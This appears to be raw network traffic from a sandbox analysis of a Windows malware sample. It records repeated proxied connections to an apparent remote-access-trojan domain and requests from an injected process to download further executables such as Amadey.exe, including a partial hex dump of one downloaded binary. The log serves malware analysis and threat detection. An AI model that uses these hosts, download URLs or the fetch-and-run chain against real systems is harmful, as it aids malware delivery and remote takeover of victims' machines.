                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.889513016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.702004910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.498939991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.405430079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2208192.168.2.55552172.37.217.341453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.078758001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2209192.168.2.553908208.109.14.49117333876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.504390001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2210192.168.2.555527142.54.237.3441453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.506010056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2211192.168.2.554014161.97.173.7878183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.506597996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2212192.168.2.55548598.170.57.23141453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.521671057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2213192.168.2.554470174.77.111.19641453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.522377968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2214192.168.2.555514185.101.16.52803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.522913933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2215192.168.2.553891128.199.196.31577153876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.523257017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2216192.168.2.553934103.28.114.18110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.523495913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.592628002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:56.175354004 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2217192.168.2.55551645.11.95.16552193876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.523807049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2218192.168.2.55552058.75.126.23541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.524447918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2219192.168.2.555482103.180.198.13081813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.525549889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.405040026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.750685930 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2220192.168.2.555522212.108.155.20590903876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.527339935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2221192.168.2.55552445.11.95.16560103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.527350903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2222192.168.2.555486103.155.166.14981813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.527631998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.022430897 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2223192.168.2.555538121.128.194.154803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.528026104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2224192.168.2.554085193.30.13.139993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.528192997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.100380898 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2225192.168.2.55556515.204.49.1488044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.082462072 CET79OUTGET /files/Amadey.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 15.204.49.148
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.301734924 CET540INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:52 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                                            Content-Length: 299
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 35 2e 32 30 34 2e 34 39 2e 31 34 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.336432934 CET55OUTGET /files/Amadey.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 15.204.49.148
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.558962107 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:52 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                                            Content-Length: 299
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 35 2e 32 30 34 2e 34 39 2e 31 34 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2226192.168.2.55556615.204.49.1488044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.090949059 CET79OUTGET /files/Silent.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 15.204.49.148
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.323389053 CET540INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:52 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                                                            Content-Length: 299
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 30 2e 33 30 20 53 65 72 76 65 72 20 61 74 20 31 35 2e 32 30 34 2e 34 39 2e 31 34 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Server at 15.204.49.148 Port 80</address></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2227192.168.2.555564185.172.128.1268044264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.099591017 CET82OUTGET /InstallSetup5.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.172.128.126
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.407174110 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:54 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                            Last-Modified: Mon, 11 Mar 2024 02:30:02 GMT
                                                                                                                                                                                                                                                            ETag: "1ca8e4-6135951a2b6e0"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Length: 1878244
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 93 15 20 57 00 00 00 00 00 00 00 00 e0 00 0f 03 0b 01 02 1a 00 8c 00 00 00 98 00 00 00 ae 01 00 75 43 00 00 00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 a5 ea 01 00 02 00 00 80 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 7c 12 00 00 00 70 03 00 e8 15 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 8b 00 00 00 10 00 00 00 8c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 30 60 2e 64 61 74 61 00 00 00 e0 00 00 00 00 a0 00 00 00 02 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 38 6a 00 00 00 b0 00 00 00 6c 00 00 00 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 00 ad 01 00 00 20 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 7c 12 00 00 00 d0 02 00 00 14 00 00 00 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 04 00 00 00 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 73 72 63 00 00 00 e8 15 02 00 00 70 03 00 00 16 02 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL WuC@ |p.text$ 0`.data@`.rdata8jl@`@.bss `.idata|@0.ndata@`.rsrcp@0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.407272100 CET1286INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 57 56 53 81 ec 9c 00 00 00 8b 55 0c 8b 45 14 83 fa 0f 74 1b 83 fa 46 0f 85 d4 01 00 00 8b 0d
                                                                                                                                                                                                                                                            Data Ascii: UWVSUEtFBHHE5 BD$E$BSSEED$E$BEWWEE}9}E)EFTFPE}FTFPE}
